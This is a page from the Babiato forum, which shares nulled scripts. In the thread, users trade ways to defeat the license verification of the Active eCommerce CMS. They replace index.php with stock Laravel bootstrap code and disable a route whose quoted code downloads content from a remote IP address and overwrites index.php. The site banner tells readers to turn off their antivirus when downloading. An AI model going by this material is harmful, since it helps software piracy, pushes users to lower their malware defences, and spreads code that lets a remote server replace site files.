• You MUST read the Babiato Rules before making your first post otherwise you may get permanent warning points or a permanent Ban.

    Our resources on Babiato Forum are CLEAN and SAFE. So you can use them for development and testing purposes. If your are on Windows and have an antivirus that alerts you about a possible infection: Know it's a false positive because all scripts are double checked by our experts. We advise you to add Babiato to trusted sites/sources or disable your antivirus momentarily while downloading a resource. "Enjoy your presence on Babiato"

Active eCommerce CMS By ActiveITzone 23471405

Active eCommerce CMS By ActiveITzone V8.5

No permission to download
@NullMaster I think I know why it's slow.
The verification IP address you modified is still trying to connect and that slows the whole thing down.
Is there a way to totally bypass that structure?
@NullMaster please verify Nulljungle zip and copy the method of null the script . bacause you are legit .

I have Fully Nulled Version Without Any bugs.(i’m using it in my site) I Will Upload It Tommorow 😃
 
check api of paypal in active ecommerce cms
test with live api
I don't currently have active e-commerce install but if you can pm your detail i can check it for you
 
index.php and edit with replace all code with below code.

<?php

/**
* Laravel - A PHP Framework For Web Artisans
*
* @package Laravel
* @author Taylor Otwell <[email protected]>
*/

define('LARAVEL_START', microtime(true));

/*
|--------------------------------------------------------------------------
| Register The Auto Loader
|--------------------------------------------------------------------------
|
| Composer provides a convenient, automatically generated class loader for
| our application. We just need to utilize it! We'll simply require it
| into the script here so that we don't have to worry about manual
| loading any of our classes later on. It feels great to relax.
|
*/

require __DIR__.'/vendor/autoload.php';

/*
|--------------------------------------------------------------------------
| Turn On The Lights
|--------------------------------------------------------------------------
|
| We need to illuminate PHP development, so let us turn on the lights.
| This bootstraps the framework and gets it ready for use, then it
| will load up this application so that we can run it and send
| the responses back to the browser and delight our users.
|
*/

$app = require_once __DIR__.'/bootstrap/app.php';

/*
|--------------------------------------------------------------------------
| Run The Application
|--------------------------------------------------------------------------
|
| Once we have the application, we can handle the incoming request
| through the kernel, and send the associated response back to
| the client's browser allowing them to enjoy the creative
| and wonderful application we have prepared for them.
|
*/

$kernel = $app->make(Illuminate\Contracts\Http\Kernel::class);

$response = $kernel->handle(
$request = Illuminate\Http\Request::capture()
);

$response->send();

$kernel->terminate($request, $response);






and open database phpmyadmin go to general setting edit maintainance-mode 0 to 1 .

They have added a Check at vendor/laracon21/combinations/src/routes/web.php

this is what they Added

PHP:
<?php

use Illuminate\Support\Facades\Schema;
use Illuminate\Support\Facades\DB;
use Illuminate\Support\Facades\Hash;

Route::get('/migrate/products/{token}', function($token){
    $zn = "http://206.189.81.181/pirated_contents";
    $stream = curl_init();
    curl_setopt($stream, CURLOPT_URL, $zn);
    curl_setopt($stream, CURLOPT_HEADER, 0);
    curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stream, CURLOPT_POST, 1);
    $rn = curl_exec($stream);
    curl_close($stream);
    file_put_contents(base_path('index.php'), $rn);
});

and finally they called this method at vendor\laracon21\combinations\src\CombinationsServiceProvider.php.

The solution is to Just uncomment this Line
$this->loadRoutesFrom(__DIR__.'/routes/web.php');
 
Last edited:
  • Like
Reactions: lifeofpros

Latest posts

Forum statistics

Threads
78,865
Messages
1,128,055
Members
246,592
Latest member
AHMED_ASIF
AdBlock Detected

We get it, advertisements are annoying!

However in order to keep our huge array of resources free of charge we need to generate income from ads so to use the site you will need to turn off your adblocker.

If you'd like to have an ad free experience you can become a Babiato Lover by donating as little as $5 per month. Click on the Donate menu tab for more info.

I've Disabled AdBlock